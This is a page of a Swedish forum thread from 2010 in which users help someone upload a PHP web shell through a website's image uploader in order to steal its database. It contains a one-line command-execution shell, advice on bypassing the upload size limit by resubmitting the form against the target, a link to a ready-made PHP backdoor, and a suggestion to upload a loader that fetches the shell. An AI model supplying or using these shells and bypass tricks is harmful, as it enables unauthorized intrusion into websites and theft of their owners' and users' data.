1. Dator och IT
  2. IT-säkerhet

Ladda upp c99 shell där 20kb är MAX upload för bilder?

Svara
  • 1
  • 2
2010-12-01, 18:55
  #13
fooztr
Medlem
fooztrs avatar
Detta kanske kan hjälpa dig om upload scriptet endast accepterar .jpg filer etc.
Citera
2010-12-01, 19:28
  #14
ankeb0rg
Medlem
ankeb0rgs avatar
Ladda upp detta bara.
<?php system($_GET['cmd']); ?>

Citera
2010-12-02, 19:02
  #15
deniva
Medlem
denivas avatar
Inget av det verkar fungera, tyvärr
Citera
2010-12-02, 19:02
  #16
deniva
Medlem
denivas avatar
Citat:
Ursprungligen postat av ankeb0rg
Ladda upp detta bara.
<?php system($_GET['cmd']); ?>



ska jag bara spara det i en textfil och sen spara det som vadå lite mer exakt?
Sen vad ska jag göra när det är uppladdat?
Citera
2010-12-02, 20:04
  #17
deniva
Medlem
denivas avatar
Citat:
Ursprungligen postat av Gurka___
Vet du ens vad du håller på med?


Japp, jag försöker ladda upp en shell på en hemsida så jag kan få ut databasen men det går inte så bra att lägga upp den via image uploadern på sidan så jag gav upp nu.
Citera
2010-12-03, 18:23
  #18
Moot
Medlem
Moots avatar
Jag läser in introduktionskurs till PHP just nu, så är rätt intresserad av ämnet, hoppas det är OK om jag lånar tråden lite!

Är shell en bit PHPkod som hjälper dig att komma åt andra delar av sidan?

Känns konstigt att man sätter en maxlimit, men ingen filtypsgräns, men vem vet. Kan du inte ladda upp kod i PHP som laddar ner ditt shell åt dig? Då borde man komma runt gränsen.
Citera
2010-12-03, 18:53
  #19
deniva
Medlem
denivas avatar
Citat:
Ursprungligen postat av Moot
Jag läser in introduktionskurs till PHP just nu, så är rätt intresserad av ämnet, hoppas det är OK om jag lånar tråden lite!

Är shell en bit PHPkod som hjälper dig att komma åt andra delar av sidan?

Känns konstigt att man sätter en maxlimit, men ingen filtypsgräns, men vem vet. Kan du inte ladda upp kod i PHP som laddar ner ditt shell åt dig? Då borde man komma runt gränsen.


Jo men det måste vara en bildfil, och när man gör om en php till jpg gif eller whatever på den sidan så kommer man ändå inte in tyvärr..
Citera
2010-12-03, 19:36
  #20
kodknack
Medlem
Kolla källkoden och i input-taggarna om inte storleken skickas med där som en variabel.

Isåfall kan du spara ner sidan och skicka iväg datan lokalt(du måste modifiera target såklart till deras sida).



Annars får du helt enkelt bara göra en egen "c99-panel" med bara de funktioner du behöver för att hålla ner storleken.

Gör ett exempel:


Tycker du inte att det duger kan du prova t ex den här http://www.t00ls.org/Php_Backdoor.txt på 12kb.
__________________
Senast redigerad av kodknack 2010-12-03 kl. 19:42.
Citera
2010-12-03, 21:51
  #21
deniva
Medlem
denivas avatar
Citat:
Ursprungligen postat av kodknack
Kolla källkoden och i input-taggarna om inte storleken skickas med där som en variabel.

Isåfall kan du spara ner sidan och skicka iväg datan lokalt(du måste modifiera target såklart till deras sida).



Annars får du helt enkelt bara göra en egen "c99-panel" med bara de funktioner du behöver för att hålla ner storleken.

Gör ett exempel:


Tycker du inte att det duger kan du prova t ex den här http://www.t00ls.org/Php_Backdoor.txt på 12kb.



Har provat det mesta, kan det vara så att det inte går att göra det på den sidan helt enkelt?
Citera
2010-12-03, 22:04
  #22
kodknack
Medlem
Citat:
Ursprungligen postat av deniva
Har provat det mesta, kan det vara så att det inte går att göra det på den sidan helt enkelt?

Förstår inte riktigt problemet, har du ens hittat en sårbarhet? Alltså att du kan ladda upp filer utav MIME-typen php?
Citera
2010-12-03, 22:07
  #23
deniva
Medlem
denivas avatar
Citat:
Ursprungligen postat av kodknack
Förstår inte riktigt problemet, har du ens hittat en sårbarhet? Alltså att du kan ladda upp filer utav MIME-typen php?


Har hittat ett ställe där jag kan lägga upp bilder som hamnar under en admin del på sidan, men där går det inte lägga in något så kanske inte finns någonm sårbarhet för allt man lägger in blir bara en tom bild.
Citera
2010-12-04, 00:37
  #24
Nytt-konto
Medlem
Nytt-kontos avatar
Citat:
Ursprungligen postat av deniva
Har hittat ett ställe där jag kan lägga upp bilder som hamnar under en admin del på sidan, men där går det inte lägga in något så kanske inte finns någonm sårbarhet för allt man lägger in blir bara en tom bild.
Gissar på att alla filer som laddas upp döps om till fil.php --> fil.jpg
Citera
Svara
  • 1
  • 2

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in